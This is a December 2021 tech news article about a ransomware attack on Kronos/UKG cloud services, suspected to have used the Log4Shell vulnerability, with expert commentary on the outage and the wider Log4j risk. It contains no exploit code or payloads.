UPDATED 22:30 EDT / DECEMBER 13 2021

SECURITY

Ransomware strikes workflow solutions provider Kronos via suspected Log4shell exploit

A ransomware attack has struck workflow management solutions provider Kronos Inc. and knocked services offline.

UKG Inc., the parent company of Kronos, said today that the ransomware attack could result in its services being out for “several weeks.” The company even suggested that its customers should seek other ways to facilitate payroll payments and human resources-related activities.

Notable Kronos customers include Tesla Inc., Marriott International Inc., Yamaha Corp., Aramark Corp., Samsung Electronics Co. Ltd. and Sony Music Entertainment.

The ransomware attack specifically targeted the Kronos Private Cloud. The attack also knocked offline UKG Workforce Central, UKG TeleStaff, Healthcare Extensions and Banking Scheduling Solutions.

“At this time, we still do not have an estimated restoration time, and it is likely that the issue may require at least several days to resolve,” UKG said in a community post. “We continue to recommend that our impacted customers evaluate alternative plans to process time and attendance data for payroll processing, to manage schedules and to manage other related operations important to their organization.”

Kronos did not reveal the form of ransomware involved in the attack. Although the company did not provide details, reports suggest that the ransomware attack exploited a Log4shell vulnerability. The Log4shell vulnerability is related to the broad Log4j vulnerability gaining headlines over the last few days.

Ars Technica noted today that Kronos’ cloud services rely heavily on Java, the software framework that Log4j is based on. The Log4Shell vulnerability allows attackers to deploy malicious code with elevated system privileges and is described as trivially easy to exploit.

The Log4j vulnerability involves a flaw in the popular open-source tool for collecting diagnostics data from applications written in the Java programming language.

“With the Log4j vulnerability impacting many internet-facing systems, Kronos/UKG may be old news soon,” James Shank, senior security evangelist and chief architect of community services at threat intelligence company Team Cymru Inc., told SiliconANGLE. “There are already reports of a variety of actors using the Log4j exploit. Microsoft has already seen a common precursor to ransomware, Cobalt Strike, landing on Log4j exploited systems. It won’t be long before we hear of ransomware events tied to Log4j as the initial vector.”

Michael Assraf, chief executive officer of vulnerability remediation company Vicarius Ltd., noted that the way modern products are built is by using a big hierarchy of dependencies. That means developers use libraries written by third-party companies and engineers to speed up the software release process.

Assraf said Log4j is an extremely basic library that allows log writing in Java applications. The way Log4j vulnerability works is that it comes in three layers: cloud products that directly use the Log4j, web applications that use libraries employing Log4j and off-the-shelf software that’s internally deployed on customer servers and endpoints. The first is where Kronos has been hit by ransomware.

Kronos could be one of many companies to come. Paul Ducklin, principal research scientist at security software company Sophos group plc, said there’s a “staggering number of different ways that the Log4Shell ‘trigger text’ can be encoded, the huge number of different places in your network traffic that these strings can appear, and the wide variety of servers and services that could be affected are collectively conspiring against all of us.”

Even with the best of intentions, including serious deployment of cybersecurity measures, Log4shell and Log4j is so serious because it bypasses many traditional protection solutions.

“Although Kronos Private Cloud was secured by firewalls, encrypted transmissions and multifactor authentication, cybercriminals were still able to breach and encrypt its servers,” explained Nick Tausek, security solutions architect at security automation company Swimlane Inc. “This extended shutdown will likely present challenges for many organizations as they seek to roll out bonuses and employees look to request time off ahead of the holidays.”

Photo: Pkonradk/Wikimedia Commons

A message from John Furrier, co-founder of SiliconANGLE:

Your vote of support is important to us and it helps us keep the content FREE.

One click below supports our mission to provide free, deep, and relevant content.  

Join our community on YouTube

Join the community that includes more than 15,000 #CubeAlumni experts, including Amazon.com CEO Andy Jassy, Dell Technologies founder and CEO Michael Dell, Intel CEO Pat Gelsinger, and many more luminaries and experts.

“TheCUBE is an important partner to the industry. You guys really are a part of our events and we really appreciate you coming and I know people appreciate the content you create as well” – Andy Jassy

THANK YOU